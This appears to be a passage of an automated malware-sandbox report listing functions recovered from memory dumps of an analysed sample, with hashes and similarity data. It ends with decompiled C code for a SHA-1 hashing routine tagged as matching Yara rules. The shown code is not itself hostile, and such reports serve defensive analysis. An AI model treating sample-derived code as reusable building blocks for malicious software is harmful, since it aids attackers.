                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B529B2, Relevance: 4.6, Strings: 3, Instructions: 851COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                                                        • API String ID: 0-2419525547
                                                        • Opcode ID: a7ad74b74d30d82263e1c8b896a711236597c8afaf3a3900c7997f394d8be11f
                                                        • Instruction ID: dd4e9d0405f4464a4a3b2a75b89cfd50eb82f8ee84ca82c6949a0a63b995137d
                                                        • Opcode Fuzzy Hash: a7ad74b74d30d82263e1c8b896a711236597c8afaf3a3900c7997f394d8be11f
                                                        • Instruction Fuzzy Hash: 7C728770604206DFDB28CF14C490ABAB7F1FF4A715F1580E9E84A9B292D731ED85DBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B5CD5B, Relevance: 4.2, Strings: 3, Instructions: 478COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • HEAP[%wZ]: , xrefs: 00BAD639
                                                        • HEAP: Free Heap block %lx modified at %lx after it was freed, xrefs: 00BAD65A
                                                        • HEAP: , xrefs: 00BAD646
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                                                        • API String ID: 0-2419525547
                                                        • Opcode ID: e803aa1a0543fe6cc44f15a99b00c91c0e1140552352ee5283493c7c2c4e5ede
                                                        • Instruction ID: 3014cfde9910797a099a74508e09a9aba754c068d7786ce2d9112ea0c32adc16
                                                        • Opcode Fuzzy Hash: e803aa1a0543fe6cc44f15a99b00c91c0e1140552352ee5283493c7c2c4e5ede
                                                        • Instruction Fuzzy Hash: 6C02AE706042459FCB28CF28C491BBABBE2EF55301F1484DEE8968B686D734E959DB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B763DB, Relevance: 4.1, Strings: 3, Instructions: 340COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %x), xrefs: 00BA9636
                                                        • HEAP[%wZ]: , xrefs: 00BA9616
                                                        • HEAP: , xrefs: 00BA9623
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %x)
                                                        • API String ID: 0-385592399
                                                        • Opcode ID: b407dbf6e52b0be500246f2392323aa351df6f48e3cb33bf9f1604464d58e4c2
                                                        • Instruction ID: e786b91b58f94d248d7ce0e5bf021eee661cc2c87471e41995ea48194fcaf7ab
                                                        • Opcode Fuzzy Hash: b407dbf6e52b0be500246f2392323aa351df6f48e3cb33bf9f1604464d58e4c2
                                                        • Instruction Fuzzy Hash: 60D1CB71A00A5A9FCB15CF69C480BBAB7F0FF18700F2481D9E5699B285D734EE41EB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B61489, Relevance: 4.0, Strings: 3, Instructions: 271COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • HEAP[%wZ]: , xrefs: 00BB2D07
                                                        • RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 00BB2D1F
                                                        • HEAP: , xrefs: 00BB2D14
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
                                                        • API String ID: 0-1596344177
                                                        • Opcode ID: 66c276eee06d955f7047f38b309e2d28ffa2b6e5325e8899c903d9b520609bb5
                                                        • Instruction ID: df70c3dfcaee5e6f707278976dbbbc4331d8369a840e120b17ce712acadf3349
                                                        • Opcode Fuzzy Hash: 66c276eee06d955f7047f38b309e2d28ffa2b6e5325e8899c903d9b520609bb5
                                                        • Instruction Fuzzy Hash: D7B18871600606DFCB28CF28C4D4A79B7F1FF58711B2986A9E85A8B792D734E980DF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00BD579A, Relevance: 3.9, Strings: 3, Instructions: 142COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • HEAP[%wZ]: , xrefs: 00BD58D7
                                                        • Heap block at %p modified at %p past requested size of %lx, xrefs: 00BD58F7
                                                        • HEAP: , xrefs: 00BD58E4
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %lx
                                                        • API String ID: 0-3722492067
                                                        • Opcode ID: 080532d77c5299cbcd882819cb9c6dd551f9dd72977fba7ac966f159dd0ee2c5
                                                        • Instruction ID: 573f91f050286638520e1abdc2eadc4cb17ea25b6094107e68487df30b30379f
                                                        • Opcode Fuzzy Hash: 080532d77c5299cbcd882819cb9c6dd551f9dd72977fba7ac966f159dd0ee2c5
                                                        • Instruction Fuzzy Hash: AE41D035220950DBD7749E19C880AB2B7E1EF04751B9488DAF8D6CB382E626DC46FB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00C03A83, Relevance: 2.8, Strings: 2, Instructions: 307COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: *.*$MUI
                                                        • API String ID: 0-3752369296
                                                        • Opcode ID: ce8683e3978dff1870ec1f4bd6a9e8231fa4e616c06213713e982964581ece26
                                                        • Instruction ID: 0f8ca25797b85f8a971d766b8a91b5c189d340ba74db6d22dc3aadeeeebb5228
                                                        • Opcode Fuzzy Hash: ce8683e3978dff1870ec1f4bd6a9e8231fa4e616c06213713e982964581ece26
                                                        • Instruction Fuzzy Hash: A6C17F359116689ACF71DF28CC49B9AB3B8AF48300F1482DAE459E7290EB709FC4CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B8D47D, Relevance: 2.4, Strings: 1, Instructions: 1138COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-3916222277
                                                        • Opcode ID: ad3ffa8fd3cf5a9f2ebcf43eefad3a142d60703c4cbaba246d006a7e48d84fab
                                                        • Instruction ID: dacfe544661bd3aa497d16acc19f83f12f709e76a819c7364cb636bfc2777c22
                                                        • Opcode Fuzzy Hash: ad3ffa8fd3cf5a9f2ebcf43eefad3a142d60703c4cbaba246d006a7e48d84fab
                                                        • Instruction Fuzzy Hash: CCA245729042699FEF219F14CC81BE9BBF5EB09300F1480EAE64DA7291DB749E84DF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B669FE, Relevance: 1.7, Strings: 1, Instructions: 437COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8@8
                                                        • API String ID: 0-222468769
                                                        • Opcode ID: 52a7b4fd9904778a68f426b789c55f952f178534bf943c7b801e7968525b1fea
                                                        • Instruction ID: 63c18aa755fa5b34f279f725aacb91a273c036a8b7742ff9f375c181019ca375
                                                        • Opcode Fuzzy Hash: 52a7b4fd9904778a68f426b789c55f952f178534bf943c7b801e7968525b1fea
                                                        • Instruction Fuzzy Hash: A3F15C71A00649AFDF15DFA4C881BAEBBF4EF04704F14849AF855EB291E379D981CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00409E5B, Relevance: 1.7, Strings: 1, Instructions: 423COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 73%
                                                        			E00409E5B(signed int* _a4, signed int _a1436491247) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t278;
				signed int* _t279;
				signed int _t280;
				signed int _t286;
				signed int _t289;
				signed int _t293;
				signed int _t296;
				signed int _t300;
				signed int _t304;
				signed int _t306;
				signed int _t312;
				signed int _t320;
				signed int _t322;
				signed int _t325;
				signed int _t327;
				signed int _t336;
				signed int _t342;
				signed int _t343;
				signed int _t348;
				signed int _t356;
				signed int _t360;
				signed int _t361;
				signed int _t365;
				signed int _t368;
				signed int _t372;
				signed int _t373;
				signed int _t402;
				signed int _t407;
				signed int _t413;
				signed int _t416;
				signed int _t423;
				signed int _t426;
				signed int _t435;
				signed int _t437;
				signed int _t440;
				signed int _t448;
				signed int _t463;
				signed int _t466;
				signed int _t467;
				signed int _t468;
				signed int _t474;
				signed int _t482;
				signed int _t483;
				signed int* _t484;
				signed int* _t487;
				signed int _t494;
				signed int _t497;
				signed int _t502;
				signed int _t505;
				signed int _t508;
				signed int _t511;
				signed int _t512;
				signed int _t516;
				signed int _t528;
				signed int _t531;
				signed int _t538;
				signed int _t544;
				signed int _t546;
				signed int _t547;

				_t547 = _t546 ^ _a1436491247;
				_t544 = _t547;
				_t487 = _a4;
				_t356 = 0;
				_t3 =  &(_t487[7]); // 0x1b
				_t278 = _t3;
				do {
					 *(_t544 + _t356 * 4 - 0x14c) = ((( *(_t278 - 1) & 0x000000ff) << 0x00000008 |  *_t278 & 0x000000ff) << 0x00000008 | _t278[1] & 0x000000ff) << 0x00000008 | _t278[2] & 0x000000ff;
					 *(_t544 + _t356 * 4 - 0x148) = (((_t278[3] & 0x000000ff) << 0x00000008 | _t278[4] & 0x000000ff) << 0x00000008 | _t278[5] & 0x000000ff) << 0x00000008 | _t278[6] & 0x000000ff;
					 *(_t544 + _t356 * 4 - 0x144) = (((_t278[7] & 0x000000ff) << 0x00000008 | _t278[8] & 0x000000ff) << 0x00000008 | _t278[9] & 0x000000ff) << 0x00000008 | _t278[0xa] & 0x000000ff;
					 *(_t544 + _t356 * 4 - 0x140) = (((_t278[0xb] & 0x000000ff) << 0x00000008 | _t278[0xc] & 0x000000ff) << 0x00000008 | _t278[0xd] & 0x000000ff) << 0x00000008 | _t278[0xe] & 0x000000ff;
					_t356 = _t356 + 4;
					_t278 =  &(_t278[0x10]);
				} while (_t356 < 0x10);
				_t279 =  &_v304;
				_v8 = 0x10;
				do {
					_t402 =  *(_t279 - 0x18);
					_t463 =  *(_t279 - 0x14);
					_t360 =  *(_t279 - 0x20) ^ _t279[5] ^  *_t279 ^ _t402;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t279[9] =  *(_t279 - 0x1c) ^ _t279[6] ^ _t279[1] ^ _t463;
					_t279[8] = _t360;
					_t320 = _t279[7] ^  *(_t279 - 0x10) ^ _t279[2];
					_t279 =  &(_t279[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t47 =  &_v8;
					 *_t47 = _v8 - 1;
					_t279[6] = _t320 ^ _t402;
					_t279[7] =  *(_t279 - 0x1c) ^  *(_t279 - 4) ^ _t360 ^ _t463;
				} while ( *_t47 != 0);
				_t322 =  *_t487;
				_t280 = _t487[1];
				_t361 = _t487[2];
				_t407 = _t487[3];
				_v12 = _t322;
				_v16 = _t487[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t466 = _v8;
					_t494 = _t322 + ( !_t280 & _t407 | _t361 & _t280) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t325 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t407;
					_v12 = _t494;
					asm("rol esi, 0x5");
					_v8 = _t361;
					_t413 = _t494 + ( !_t325 & _t361 | _t280 & _t325) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t497 = _t280;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t365 = _v12;
					_v8 = _t325;
					_t327 = _v8;
					_v12 = _t413;
					asm("rol edx, 0x5");
					_t286 = _t413 + ( !_t365 & _t497 | _t325 & _t365) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t416 = _v12;
					_v16 = _t497;
					asm("ror ecx, 0x2");
					_v8 = _t365;
					_v12 = _t286;
					asm("rol eax, 0x5");
					_v16 = _t327;
					_t502 = _t286 + ( !_t416 & _t327 | _t365 & _t416) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t361 = _v12;
					_t289 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t416;
					_v12 = _t502;
					asm("rol esi, 0x5");
					_v16 = _t289;
					_t280 = _v12;
					_t505 = _t502 + ( !_t361 & _t289 | _t416 & _t361) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t407 = _v8;
					asm("ror ecx, 0x2");
					_t467 = _t466 + 5;
					_t322 = _t505;
					_v12 = _t322;
					_v8 = _t467;
				} while (_t467 < 0x14);
				_t468 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t407;
					_t508 = _t505 + (_t407 ^ _t361 ^ _t280) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t336 = _v12;
					_v12 = _t508;
					asm("rol esi, 0x5");
					_t423 = _t508 + (_t361 ^ _t280 ^ _t336) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t511 = _t280;
					_v16 = _t361;
					_t368 = _v12;
					_v12 = _t423;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t293 = _t423 + (_t280 ^ _t336 ^ _t368) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t426 = _v12;
					_v8 = _t336;
					_v8 = _t368;
					_v12 = _t293;
					asm("rol eax, 0x5");
					_t468 = _t468 + 5;
					_t361 = _v12;
					asm("ror edx, 0x2");
					_t147 = _t511 + 0x6ed9eba1; // 0x6ed9eb9f
					_t512 = _t293 + (_t336 ^ _v8 ^ _t426) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x154)) + _t147;
					_t296 = _v8;
					_v8 = _t426;
					_v12 = _t512;
					asm("rol esi, 0x5");
					_t407 = _v8;
					_t505 = _t512 + (_t296 ^ _v8 ^ _t361) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x150)) + _t336 + 0x6ed9eba1;
					_v16 = _t296;
					_t280 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t505;
				} while (_t468 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t407;
					asm("ror eax, 0x2");
					_t516 = ((_t361 | _t280) & _t407 | _t361 & _t280) +  *((intOrPtr*)(_t544 + _v8 * 4 - 0x14c)) + _t505 + _v16 - 0x70e44324;
					_t474 = _v12;
					_v12 = _t516;
					asm("rol esi, 0x5");
					_t342 = _v8;
					asm("ror edi, 0x2");
					_t435 = ((_t280 | _t474) & _t361 | _t280 & _t474) +  *((intOrPtr*)(_t544 + _t342 * 4 - 0x148)) + _t516 + _v16 - 0x70e44324;
					_v16 = _t361;
					_t372 = _v12;
					_v12 = _t435;
					asm("rol edx, 0x5");
					_v8 = _t280;
					_t437 = ((_t474 | _t372) & _t280 | _t474 & _t372) +  *((intOrPtr*)(_t544 + _t342 * 4 - 0x144)) + _t435 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t300 = _v12;
					_v8 = _t474;
					_v12 = _t437;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t528 = ((_t372 | _t300) & _t474 | _t372 & _t300) +  *((intOrPtr*)(_t544 + _t342 * 4 - 0x140)) + _t437 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t440 = _t372;
					_t361 = _v12;
					_v8 = _t440;
					_v12 = _t528;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t505 = ((_t300 | _t361) & _t440 | _t300 & _t361) +  *((intOrPtr*)(_t544 + _t342 * 4 - 0x13c)) + _t528 + _v16 - 0x70e44324;
					_t407 = _t300;
					_t280 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t505;
					_t343 = _t342 + 5;
					_v8 = _t343;
				} while (_t343 < 0x3c);
				_t482 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t483 = _v8;
					asm("ror eax, 0x2");
					_t531 = (_t407 ^ _t361 ^ _t280) +  *((intOrPtr*)(_t544 + _t482 * 4 - 0x14c)) + _t505 + _v16 - 0x359d3e2a;
					_t348 = _v12;
					_v16 = _t407;
					_v12 = _t531;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t448 = (_t361 ^ _t280 ^ _t348) +  *((intOrPtr*)(_t544 + _t483 * 4 - 0x148)) + _t531 + _v16 - 0x359d3e2a;
					_v16 = _t361;
					_t373 = _v12;
					_v12 = _t448;
					asm("rol edx, 0x5");
					_v16 = _t280;
					asm("ror ecx, 0x2");
					_t304 = (_t280 ^ _t348 ^ _t373) +  *((intOrPtr*)(_t544 + _t483 * 4 - 0x144)) + _t448 + _v16 - 0x359d3e2a;
					_t407 = _v12;
					_v12 = _t304;
					asm("rol eax, 0x5");
					_v16 = _t348;
					_t538 = (_t348 ^ _t373 ^ _t407) +  *((intOrPtr*)(_t544 + _t483 * 4 - 0x140)) + _t304 + _v16 - 0x359d3e2a;
					_t306 = _t373;
					_v8 = _t348;
					asm("ror edx, 0x2");
					_v8 = _t373;
					_t361 = _v12;
					_v12 = _t538;
					asm("rol esi, 0x5");
					_t482 = _t483 + 5;
					_t505 = (_t306 ^ _t407 ^ _t361) +  *((intOrPtr*)(_t544 + _t483 * 4 - 0x13c)) + _t538 + _v16 - 0x359d3e2a;
					_v16 = _t306;
					_t280 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t407;
					_v12 = _t505;
					_v8 = _t482;
				} while (_t482 < 0x50);
				_t484 = _a4;
				_t484[2] = _t484[2] + _t361;
				_t484[3] = _t484[3] + _t407;
				_t312 = _t484[4] + _v16;
				 *_t484 =  *_t484 + _t505;
				_t484[1] = _t484[1] + _t280;
				_t484[4] = _t312;
				_t484[0x17] = 0;
				return _t312;
			}


































































                                                        0x00409e5b
                                                        0x00409e61
                                                        0x00409e6b
                                                        0x00409e6f
                                                        0x00409e71
                                                        0x00409e71
                                                        0x00409e74
                                                        0x00409e96
                                                        0x00409ebc
                                                        0x00409ee2
                                                        0x00409f04
                                                        0x00409f0b
                                                        0x00409f0e
                                                        0x00409f11
                                                        0x00409f1a
                                                        0x00409f20
                                                        0x00409f27
                                                        0x00409f38
                                                        0x00409f3b
                                                        0x00409f3e
                                                        0x00409f42
                                                        0x00409f44
                                                        0x00409f46
                                                        0x00409f4f
                                                        0x00409f52
                                                        0x00409f55
                                                        0x00409f60
                                                        0x00409f66
                                                        0x00409f68
                                                        0x00409f68
                                                        0x00409f6b
                                                        0x00409f6e
                                                        0x00409f6e
                                                        0x00409f73
                                                        0x00409f75
                                                        0x00409f78
                                                        0x00409f7b
                                                        0x00409f81
                                                        0x00409f84
                                                        0x00409f87
                                                        0x00409f90
                                                        0x00409f96
                                                        0x00409f9f
                                                        0x00409fae
                                                        0x00409fb5
                                                        0x00409fb8
                                                        0x00409fbb
                                                        0x00409fc4
                                                        0x00409fc7
                                                        0x00409fca
                                                        0x00409fe2
                                                        0x00409fe9
                                                        0x00409feb
                                                        0x00409fee
                                                        0x00409ff1
                                                        0x00409ffa
                                                        0x0040a001
                                                        0x0040a004
                                                        0x0040a007
                                                        0x0040a016
                                                        0x0040a01d
                                                        0x0040a020
                                                        0x0040a023
                                                        0x0040a02c
                                                        0x0040a036
                                                        0x0040a039
                                                        0x0040a045
                                                        0x0040a048
                                                        0x0040a04f
                                                        0x0040a052
                                                        0x0040a055
                                                        0x0040a05a
                                                        0x0040a05d
                                                        0x0040a066
                                                        0x0040a077
                                                        0x0040a07a
                                                        0x0040a07d
                                                        0x0040a084
                                                        0x0040a087
                                                        0x0040a08a
                                                        0x0040a08d
                                                        0x0040a08f
                                                        0x0040a092
                                                        0x0040a095
                                                        0x0040a09e
                                                        0x0040a0a3
                                                        0x0040a0a3
                                                        0x0040a0b8
                                                        0x0040a0bb
                                                        0x0040a0be
                                                        0x0040a0c5
                                                        0x0040a0c8
                                                        0x0040a0cb
                                                        0x0040a0e0
                                                        0x0040a0e7
                                                        0x0040a0ea
                                                        0x0040a0ee
                                                        0x0040a0f1
                                                        0x0040a0f6
                                                        0x0040a0f9
                                                        0x0040a108
                                                        0x0040a10b
                                                        0x0040a112
                                                        0x0040a115
                                                        0x0040a118
                                                        0x0040a11b
                                                        0x0040a11e
                                                        0x0040a126
                                                        0x0040a134
                                                        0x0040a137
                                                        0x0040a13a
                                                        0x0040a13a
                                                        0x0040a141
                                                        0x0040a144
                                                        0x0040a147
                                                        0x0040a14f
                                                        0x0040a15d
                                                        0x0040a160
                                                        0x0040a167
                                                        0x0040a16a
                                                        0x0040a16d
                                                        0x0040a170
                                                        0x0040a173
                                                        0x0040a17c
                                                        0x0040a183
                                                        0x0040a183
                                                        0x0040a189
                                                        0x0040a1a2
                                                        0x0040a1a5
                                                        0x0040a1ac
                                                        0x0040a1af
                                                        0x0040a1b2
                                                        0x0040a1c4
                                                        0x0040a1ce
                                                        0x0040a1d1
                                                        0x0040a1da
                                                        0x0040a1dd
                                                        0x0040a1e4
                                                        0x0040a1e7
                                                        0x0040a1ed
                                                        0x0040a200
                                                        0x0040a207
                                                        0x0040a20a
                                                        0x0040a20d
                                                        0x0040a210
                                                        0x0040a219
                                                        0x0040a21c
                                                        0x0040a22f
                                                        0x0040a232
                                                        0x0040a23c
                                                        0x0040a23f
                                                        0x0040a241
                                                        0x0040a24a
                                                        0x0040a24d
                                                        0x0040a260
                                                        0x0040a266
                                                        0x0040a269
                                                        0x0040a270
                                                        0x0040a272
                                                        0x0040a275
                                                        0x0040a278
                                                        0x0040a27b
                                                        0x0040a27e
                                                        0x0040a281
                                                        0x0040a28a
                                                        0x0040a28f
                                                        0x0040a292
                                                        0x0040a292
                                                        0x0040a2a5
                                                        0x0040a2a8
                                                        0x0040a2ab
                                                        0x0040a2b2
                                                        0x0040a2b5
                                                        0x0040a2b8
                                                        0x0040a2bb
                                                        0x0040a2ce
                                                        0x0040a2d1
                                                        0x0040a2dc
                                                        0x0040a2df
                                                        0x0040a2eb
                                                        0x0040a2ee
                                                        0x0040a2f4
                                                        0x0040a2f7
                                                        0x0040a2fa
                                                        0x0040a301
                                                        0x0040a311
                                                        0x0040a314
                                                        0x0040a31a
                                                        0x0040a31d
                                                        0x0040a324
                                                        0x0040a326
                                                        0x0040a329
                                                        0x0040a32c
                                                        0x0040a32f
                                                        0x0040a332
                                                        0x0040a339
                                                        0x0040a348
                                                        0x0040a34b
                                                        0x0040a352
                                                        0x0040a355
                                                        0x0040a358
                                                        0x0040a35b
                                                        0x0040a35e
                                                        0x0040a361
                                                        0x0040a364
                                                        0x0040a36d
                                                        0x0040a37e
                                                        0x0040a386
                                                        0x0040a38c
                                                        0x0040a38f
                                                        0x0040a391
                                                        0x0040a394
                                                        0x0040a397
                                                        0x0040a3a4

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (
                                                        • API String ID: 0-3887548279
